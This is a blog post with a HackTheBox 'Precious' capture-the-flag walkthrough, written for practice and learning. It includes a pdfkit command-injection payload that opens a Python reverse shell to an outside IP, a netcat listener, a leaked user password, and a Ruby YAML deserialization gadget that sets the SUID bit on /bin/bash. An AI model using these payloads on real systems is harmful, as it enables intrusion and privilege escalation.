<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Precious HackTheBox Easy" /><meta property="og:locale" content="en" /><meta name="description" content="walkthrough / Tryhackme" /><meta property="og:description" content="walkthrough / Tryhackme" /><link rel="canonical" href="https://sujayadkesar.github.io/posts/Precious-HTB-Machines/" /><meta property="og:url" content="https://sujayadkesar.github.io/posts/Precious-HTB-Machines/" /><meta property="og:site_name" content="SUJAY_ADKESAR" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-10-20T22:00:02+05:30" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Precious HackTheBox Easy" /><meta name="twitter:site" content="@SUJAY_ADKESAR" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-12-23T20:58:50+05:30","datePublished":"2022-10-20T22:00:02+05:30","description":"walkthrough / Tryhackme","headline":"Precious HackTheBox Easy","mainEntityOfPage":{"@type":"WebPage","@id":"https://sujayadkesar.github.io/posts/Precious-HTB-Machines/"},"url":"https://sujayadkesar.github.io/posts/Precious-HTB-Machines/"}</script><title><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209340923-763cc8d2-e9fa-4afb-b2c5-3b7edc1b0851.png"> Precious | HackTheBox | Easy | SUJAY_ADKESAR</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="SUJAY_ADKESAR"><meta name="application-name" content="SUJAY_ADKESAR"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/profile.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">SUJAY_ADKESAR</a></div><div class="site-subtitle font-italic">HackThebox / TryHackme Btech in cybersecurity & cyberforensics</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/sujayadkesar" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://instagram.com/SUJAY_ADKESAR" aria-label="instagram" target="_blank" rel="noopener"> <i class="fab fa-instagram"></i> </a> <a href="https://www.linkedin.com/in/sujay-adkesar-a90725224" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a> <a href="https://sujayadkesar.live" aria-label="portfolio" target="_blank" rel="noopener"> <i class="fas fa-user"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209340923-763cc8d2-e9fa-4afb-b2c5-3b7edc1b0851.png"> Precious | HackTheBox | Easy</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip><img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 50 50'%3E%3C/svg%3E" width="50" height="50" alt="front-page port 80-shoopyu" data-src="https://user-images.githubusercontent.com/95465072/209340923-763cc8d2-e9fa-4afb-b2c5-3b7edc1b0851.png" data-proofer-ignore> Precious | HackTheBox | Easy</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1666283402" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Oct 20, 2022 </em> </span> <span> Updated <em class="" data-ts="1671809330" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Dec 23, 2022 </em> </span><div class="d-flex justify-content-between"> <span> By <em> <a href="https://twitter.com/SUJAY_ADKESAR">SUJAY ADKESAR</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="589 words"> <em>3 min</em> read</span></div></div></div><div class="post-content"><hr /><p><img width="590" alt="precious-htb" data-src="https://user-images.githubusercontent.com/95465072/208431959-7e9254d5-7d6b-46f5-8e5f-a257729a6eb2.png" data-proofer-ignore></p><p><a href="https://app.hackthebox.com/machines/513">HackTheBox / Precious - machine!</a></p><hr /><h2 id="enumeration-nmap"><span class="mr-2">Enumeration {nmap}</span><a href="#enumeration-nmap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="language-sh highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">sudo </span>nmap <span class="nt">-sV</span> <span class="nt">-sC</span> &lt;target-ip&gt;
</pre></table></code></div></div><h3 id="result"><span class="mr-2">Result:</span><a href="#result" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>┌──(root㉿kali)-[/home/local_host/Desktop/machines/precious-HTB]
└─# nmap -sV -sC 10.10.11.189                 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 08:28 EST
Nmap scan report for 10.10.11.189
Host is up (0.51s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.86 seconds
</pre></table></code></div></div><h2 id="web-reconnaissance"><span class="mr-2">Web Reconnaissance</span><a href="#web-reconnaissance" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>So Let’s first enumerate port 80. The index page looks like this. Page source contains nothing useful.</p><p><img data-src="https://user-images.githubusercontent.com/95465072/207928050-7eb4dcda-200c-49f3-99db-6337026dd3ca.png" alt="80-precious" data-proofer-ignore></p><p>The web server appears to offer a service that converts web pages into PDF files. Let’s test this functionality out.</p><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008582533/4b8b101e-f65a-451c-94c7-087c81493802.webp?auto=compress,format&amp;format=webp" alt="1_rQGaBrXKGZtnBwTeLP5tZg.webp" data-proofer-ignore></p><div class="language-sh highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>python3 <span class="nt">-m</span> http.server <span class="nt">--bind</span> 127.0.0.1 80
</pre></table></code></div></div><p>Once your server is running, go back to precious.htb and enter the IP address and port number your server is running on, and click submit. As expected, a pdf file should be downloaded to your machine. Mine looks like this:</p><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008594683/5db20699-5474-4b4b-a669-755ffc2b6ec6.webp?auto=compress,format&amp;format=webp" alt="1_7Q3i6kaKvTVB2OKarJqyww.webp" data-proofer-ignore></p><h4 id="lets-check-the-metadata-of-this"><span class="mr-2">Let’s check the metadata of this!!</span><a href="#lets-check-the-metadata-of-this" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre>┌──(root㉿kali)
|
└─# exiftool 61fs66gu9di2n46jugnn8n21hfgfj4fg.pdf
ExifTool Version Number         : 12.51
File Name                       : 61fs66gu9di2n46jugnn8n21hfgfj4fg.pdf
Directory                       : .
File Size                       : 18 kB
File Modification Date/Time     : 2022:12:10 08:35:39-05:00
File Access Date/Time           : 2022:12:10 08:35:52-05:00
File Inode Change Date/Time     : 2022:12:10 08:35:39-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6
</pre></table></code></div></div><p>What’s interesting to us here is that the file is generated by <strong>pdfkit v0.8.6.</strong> a PDF document generation library. Doing a quick google search looking for any known vulnerabilities we find <code class="language-plaintext highlighter-rouge">CVE-2022–25765</code></p><h2 id="exploit"><span class="mr-2">Exploit</span><a href="#exploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><h3 id="payload"><span class="mr-2">Payload</span><a href="#payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><div class="language-sh highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://xx.xx.xx.xx/?name<span class="o">=</span>%20<span class="sb">`</span>python3 <span class="nt">-c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.14.21",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</span><span class="sb">`</span>
</pre></table></code></div></div><h3 id="listener"><span class="mr-2">Listener</span><a href="#listener" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><div class="language-sh highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nc <span class="nt">-lnvp</span> 9001
</pre></table></code></div></div><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008670007/93dff2e1-b8e9-4ff7-9836-1f5b6d50b9e8.webp?auto=compress,format&amp;format=webp" alt="1_eKwh6KNdXAW8NTLaMU-TZA.webp" data-proofer-ignore></p><p>Looking around a bit more, we find a file in /home/ruby/.bundle directory called config. Displaying the contents of config reveals the password for user henry</p><h2 id="foothold"><span class="mr-2">Foothold</span><a href="#foothold" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>As you can see, we managed to log into the server as the user ruby. Navigating to the /home directory, we find two directories. One for our ruby user, and one for a user called henry. Inside henry’s directory we can see a file called user.txt. That’s got to be our first flag. Unfortunately, we can’t access it yet</p><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008738144/e4710698-d59a-4b61-9153-c8edfb8d4f73.webp?auto=compress,format&amp;format=webp" alt="1_T9L8TuHDBNYhsugJctzCoA.webp" data-proofer-ignore></p><p>instead we got password for henry’s account <code class="language-plaintext highlighter-rouge">Q3c1AqGHtoI0aXAYFH</code></p><div class="language-sh highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ssh henry@&lt;ip-addr&gt;
</pre></table></code></div></div><h2 id="privilege-escalation"><span class="mr-2">Privilege Escalation:</span><a href="#privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008817753/c0b8f3f5-b688-4c8d-8773-f6e8bf40d31e.webp?auto=compress,format&amp;format=webp" alt="1_Lw_aaW0-w4GS1g0MSqtZwg.webp" data-proofer-ignore></p><p>It appears that henry can run the file update_depencies.rb <strong>as root</strong>. Use cat to take a look at the file</p><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008831300/5446402e-3683-4097-9ddc-95261d086fbb.webp?auto=compress,format&amp;format=webp" alt="1_q5yGqzQ3IUSLAvZ4H2TL9Q.webp" data-proofer-ignore></p><p><a href="https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565">click here to copy the payload</a></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre>create a file called dependencies.yml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &amp;1 !ruby/object:Net::BufferedIO
      io: &amp;1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &amp;1 !ruby/object:Net::WriteAdapter
         socket: &amp;1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod u+s /bin/bash
         method_id: :resolve
</pre></table></code></div></div><blockquote><p><strong>note</strong> : Replace the id with <code class="language-plaintext highlighter-rouge">chmod u+s /bin/bash</code></p></blockquote><p>Run the file</p><div class="language-sh highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">sudo</span> /usr/bin/ruby /opt/update_dependencies.rb
</pre></table></code></div></div><p><img data-src="https://cdn.hashnode.com/res/hashnode/image/upload/v1670008869699/1561e141-d42b-4bcb-b571-1d08c7ef21f3.webp?auto=compress,format&amp;format=webp" alt="1__MagsGJeINwnESjf6izVUw.webp" data-proofer-ignore></p><p>   </p><h1 id="congragulations-you-got-the-root-access">Congragulations You got the root access!!</h1><p><strong>USER FLAG</strong> <code class="language-plaintext highlighter-rouge">75fb440c0ef7fd22c28f************</code></p><p><strong>ROOT FLAG</strong> <code class="language-plaintext highlighter-rouge">6e8dfa9c1c1968383f0c************</code></p><hr /></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/write-up/'>Write Up</a>, <a href='/categories/hackthebox/'>HackTheBox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/pdfkit/" class="post-tag no-text-decoration" >pdfkit</a> <a href="/tags/web/" class="post-tag no-text-decoration" >web</a> <a href="/tags/http/" class="post-tag no-text-decoration" >http</a> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/tags/easy/" class="post-tag no-text-decoration" >easy</a> <a href="/tags/walkthrough/" class="post-tag no-text-decoration" >walkthrough</a> <a href="/tags/precious/" class="post-tag no-text-decoration" >precious</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=%3Cimg+width%3D%2250%22+height%3D%2250%22+alt%3D%22front-page+port+80-shoopyu%22+src%3D%22https%3A%2F%2Fuser-images.githubusercontent.com%2F95465072%2F209340923-763cc8d2-e9fa-4afb-b2c5-3b7edc1b0851.png%22%3E+Precious++%7C+HackTheBox+%7C+Easy+-+SUJAY_ADKESAR&url=https%3A%2F%2Fsujayadkesar.github.io%2Fposts%2FPrecious-HTB-Machines%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=%3Cimg+width%3D%2250%22+height%3D%2250%22+alt%3D%22front-page+port+80-shoopyu%22+src%3D%22https%3A%2F%2Fuser-images.githubusercontent.com%2F95465072%2F209340923-763cc8d2-e9fa-4afb-b2c5-3b7edc1b0851.png%22%3E+Precious++%7C+HackTheBox+%7C+Easy+-+SUJAY_ADKESAR&u=https%3A%2F%2Fsujayadkesar.github.io%2Fposts%2FPrecious-HTB-Machines%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fsujayadkesar.github.io%2Fposts%2FPrecious-HTB-Machines%2F&text=%3Cimg+width%3D%2250%22+height%3D%2250%22+alt%3D%22front-page+port+80-shoopyu%22+src%3D%22https%3A%2F%2Fuser-images.githubusercontent.com%2F95465072%2F209340923-763cc8d2-e9fa-4afb-b2c5-3b7edc1b0851.png%22%3E+Precious++%7C+HackTheBox+%7C+Easy+-+SUJAY_ADKESAR" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fsujayadkesar.github.io%2Fposts%2FPrecious-HTB-Machines%2F" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Photobomb-HTB-Machines/"><img width="50" height="50" alt="photobomb" src="https://user-images.githubusercontent.com/95465072/209364309-5c18410b-a7eb-41f6-bdc0-a1c0a6f8f9f4.png"> Photobomb | HackTheBox | Machine</a><li><a href="/posts/Recommended-Books/"><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209675071-eef81a36-9b8f-42c2-866c-ef9496d53667.jpg"> Recommended Books to begin with! | Books</a><li><a href="/posts/basic_pentesting/"><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209341794-a1280124-d216-4dc7-825c-376bf69bfb85.png"> Basic Pentesting | TryHackMe Easy</a><li><a href="/posts/Simple-CTF/"><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209341582-f0dead6c-5576-443b-9efb-68ab1b79f6f2.png"> Simple CTF| Tryhackme | Easy</a><li><a href="/posts/Meow-HTB-Startingpoint/"><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209341164-f49d4c04-ddbb-4325-a086-1d63fff9c5cf.png"> Meow | HackTheBox Easy</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/walkthrough/">walkthrough</a> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/write-up/">write up</a> <a class="post-tag" href="/tags/http/">http</a> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/machine/">machine</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/docker/">docker</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Shoppy-HTB-Machines/"><div class="card-body"> <em class="small" data-ts="1668201602" data-df="ll" > Nov 12, 2022 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209339137-7cdb2cf0-2ee2-4941-b213-1f796eb4f4ef.png"> Shoppy | HackTheBox | Easy</h3><div class="text-muted small"><p> Reconnaissance 1 nmap -sV -sC &amp;lt;target-ip&amp;gt; Results 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 21:13 EST Nmap scan report for 10.10.1...</p></div></div></a></div><div class="card"> <a href="/posts/Illumination-Forensics-HTB-challenge/"><div class="card-body"> <em class="small" data-ts="1670705402" data-df="ll" > Dec 11, 2022 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209355489-9dc22e00-44a6-4aa3-a642-47bfbd5be517.png"> Illumination | HackTheBox | Forensics Challange</h3><div class="text-muted small"><p> Illumination Files Provided There’s only one file is provided which has sub directories as follows 1 2 3 4 |--Illumination.JS |-------.git |-------config.json |-------bot.js cat ...</p></div></div></a></div><div class="card"> <a href="/posts/Photobomb-HTB-Machines/"><div class="card-body"> <em class="small" data-ts="1670793602" data-df="ll" > Dec 12, 2022 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip><img width="50" height="50" alt="photobomb" src="https://user-images.githubusercontent.com/95465072/209364309-5c18410b-a7eb-41f6-bdc0-a1c0a6f8f9f4.png"> Photobomb | HackTheBox | Machine</h3><div class="text-muted small"><p> Enumeration Nmap 1 nmap -sV -sC &amp;lt;target ip&amp;gt; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 10:47 EST Nmap scan report for 10.10.11.182...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Simple-CTF/" class="btn btn-outline-primary" prompt="Older"><p><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209341582-f0dead6c-5576-443b-9efb-68ab1b79f6f2.png"> Simple CTF| Tryhackme | Easy</p></a> <a href="/posts/Shoppy-HTB-Machines/" class="btn btn-outline-primary" prompt="Newer"><p><img width="50" height="50" alt="front-page port 80-shoopyu" src="https://user-images.githubusercontent.com/95465072/209339137-7cdb2cf0-2ee2-4941-b213-1f796eb4f4ef.png"> Shoppy | HackTheBox | Easy</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/SUJAY_ADKESAR">SUJAY ADKESAR</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/walkthrough/">walkthrough</a> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/write-up/">write up</a> <a class="post-tag" href="/tags/http/">http</a> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/machine/">machine</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/docker/">docker</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 